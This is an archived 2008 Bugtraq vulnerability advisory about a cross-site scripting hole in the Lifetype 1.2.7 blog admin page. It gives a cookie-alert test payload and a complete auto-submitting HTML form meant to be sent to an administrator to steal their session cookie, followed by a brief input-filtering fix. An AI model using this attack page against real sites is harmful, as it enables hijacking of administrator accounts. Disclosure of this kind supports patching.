Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos

Bugtraq: Lifetype 1.2.7 XSS Vulnerability

Lifetype 1.2.7 XSS Vulnerability

From: <irancrash_at_gmail.com>
Date: 2 May 2008 09:00:08 -0000
('binary' encoding is not supported, stored as-is) ----------------------------------------------------------------
Script : Lifetype 1.2.7
Type : XSS Vulnerabilities
----------------------------------------------------------------
Discovered by : Dr.Crash Or Khashayar Fereidani
Our Team : IRCRASH
----------------------------------------------------------------
Our Site : http://IRCRASH.COM
IRCRASH Bugtraq : http://BUGTRAQ.IRCRASH.COM
----------------------------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
----------------------------------------------------------------
Script Download : http://garr.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.7.tar.bz2
----------------------------------------------------------------
URL : http://Example/admin.php?op=editArticleCategories
Method : Post
variable : searchTerms
Query For Send : " [XSS CODE]
Example : Send With Post : " <script>alert(document.cookie)</script>
----------------------------------------------------------------
You Can Get Admin Cookie With It
Upload This File And Send This Page For Admin
HTML PAGE FOR GET ADMIN COOKIE :
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://Example/lifetype/admin.php?op=editArticleCategories"

method="POST" name="form">

<input type="hidden" name="searchTerms" value="&#x22;&#x20; [XSS CODE]">

</form>
</body>
</html>
----------------------------------------------------------------
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function .......
----------------------------------------------------------------
TNx : God......
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
----------------------------------------------------------------
Received on May 02 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]